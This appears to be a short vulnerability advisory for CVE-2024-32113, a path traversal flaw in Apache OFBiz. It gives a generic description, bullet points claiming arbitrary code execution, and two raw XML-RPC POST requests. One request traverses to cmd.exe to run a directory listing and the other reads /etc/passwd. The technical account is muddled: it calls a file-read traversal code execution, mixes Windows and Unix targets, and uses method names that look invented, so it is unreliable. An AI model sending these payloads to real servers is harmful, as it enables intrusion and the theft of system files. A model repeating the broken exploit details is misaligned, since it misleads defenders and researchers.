A vulnerability classified as critical, has been found in Apache OFBiz up to 18.12.12. Affected by this issue is an unknown functionality. The manipulation with an unknown input leads to a path traversal vulnerability. The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Impacted is confidentiality, integrity, and availability.

• The CVE-2024-32113 vulnerability allows for arbitrary code execution on an Apache OFBiz server by sending a specially crafted HTTP request.
• In this request, the attacker uses the parameter ../../../../../../etc/passwd to point to the etc/passwd file on the Apache OFBiz server.
• When the Apache OFBiz server processes this request, it will attempt to read the etc/passwd file, which contains sensitive information about the users on the server.
• This information can be used to carry out further attacks on the server, such as stealing data, modifying it, or even deleting it.

POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>performCommand</methodName>
  <params>
    <param>
      <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
    </param>
  </params>
</methodCall>

POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>example.createBlogPost</methodName>
  <params>
    <param>
      <value><string>../../../../../../etc/passwd</string></value>
    </param>
  </params>
</methodCall>